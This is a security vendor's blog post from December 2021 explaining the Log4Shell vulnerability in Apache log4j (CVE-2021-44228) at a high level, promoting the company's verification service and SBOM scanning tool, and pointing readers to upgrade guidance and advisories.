dekra

Why did the European Commission delay the application of the essential requirements for RED-DA?

SecSAM: Empowering Your Supply Chain Management in Compliance with EO 14028

How to comply with the mandatory cybersecurity regulation RED-DA in light of ETSI EN 303 645 standard becoming a global trend?

DEKRA launches the first Pilot Program for the Delegated Act of RED Directive

Cybersecurity Certification Program for Electric Vehicles Charging Stations

From Penetration Testing to Red Team Assessment, the Diagnosis of Potential Information Security Threats is Expanded

An Imminent Task in 2023: How to Protect OT Systems with IEC 62443-2-4 & 3-3

Smart medical cybersecurity legislation promulgated - How should medical device manufacturers deploy?

How can connected cars resist malicious attacks ? - The latest security trends in the automotive supply chain

ioXt intelligence: A Q&A with Morgan Hung, general manager of Onward Security

Security Incident
15.Dec.2021

Avoid falling victim to the worst zero-day vulnerability in recent years! Understanding what Apache log4j is? How to patch the CVE-2021-44228 vulnerability

Share:

What is Apache log4j

The Apache Foundation issued a serious vulnerability warning about log4j earlier. Log4j is a common open-source logging framework. Many developers use it to log activity in their applications. The reported remote code execution vulnerability (CVE-2021-44228) exists in all versions of log4j 2.x to 2.16.0 (released 2021/12/13). This vulnerability is called "Log4Shell". It allows an unauthenticated remote attacker to execute arbitrary code by writing system logs with remote JNDI API calls, thereby gaining control of the target system. The severity of the vulnerability is rated at 10 out of 10 according to Common Vulnerability Scoring System (CVSS) v3.1. Since log4j is widely used in different commercial applications and services, including Minecraft, Elasticsearch, and VMware VCenter, the log4j vulnerability is arguably one of the worst in recent history.

Check for Apache log4j vulnerability by verification service

If you're not certain whether your existing services or products are affected by this security vulnerability, the HERMAS research team of Onward Security has successfully reproduced the security vulnerability of Log4Shell and started to provide customer security vulnerability verification service. We can assist in detecting whether your systems and products are affected by this security vulnerability.

Identify Apache log4j risks with SecSAM

By using HERCULES SecSAM, you can create an Software Bill of Materials (SBOM) for your product and check if the component that contains this vulnerability is used. You can also use the firmware scanning automatic analysis software to confirm whether this risk component exists in the firmware.
 
SecSAM_Open_Source_Security_L
(Identify potential risks in products through SecSAM)
 

Mitigation solutions

When HERCULES SecSAM detects an affected version of Log4j after scanning, you can upgrade Log4j to a version above 2.16.0 (inclusive). You can also refer to the following vulnerability mitigation solutions compiled by SecSAM.


Vendor Advisory
  • [oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
  • https://logging.apache.org/log4j/2.x/security.html
  • https://security.netapp.com/advisory/ntap-20211210-0007/
Third Party Advisory
  • [oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
  • https://logging.apache.org/log4j/2.x/security.html
  • https://security.netapp.com/advisory/ntap-20211210-0007/
Ref. National Vulnerability Database
Blog Events White Papers

Inquiry

Contact Us
Thank you for visiting us. Please leave your contact information, and we will reply you as soon as we can.
  • Onward Security is committed to your privacy. Your information won't be shared with third parties and is used to contact you about relevant content. You may unsubscribe at any time. For more info, please read our Privacy Policy. By clicking below submit button, you consent to allow Onward Security to store and process the personal information submitted above to provide you the content requested.
    Submit

Why Onward Security

In-depth Cybersecurity Techniques+

  • Uncovered 40+ zero-day vulnerabilities (CVE)
  • Discovered 3000+ IoT product vulnerabilities

Dedicated to IoT Product Security+

  • 150+ cybersecurity projects in IoT industry
  • Tested 700+ IoT product security

Global Compliance and Certification Capability+

  • 300+ customers / 10+ countries certification obtained
  • Compliance experience in IIoT, medical, automotive, BFSI, and consumer IoT industry
dekra
  • x
Subscribe to Newsletter:
Send

Verification

Click the numbers in sequence.

Change
2023 Onward Security, a DEKRA Company. All rights reserved.
dekra
  • x
WeChat
This site uses cookies to improve your experience and to provide content customized specifically to your interests. By continuing to browse our site without changing your cookie settings (click the Privacy Policy button for more info), or by clicking the Continue button, you hereby acknowledge and agree to our privacy policy and use of cookies.
Continue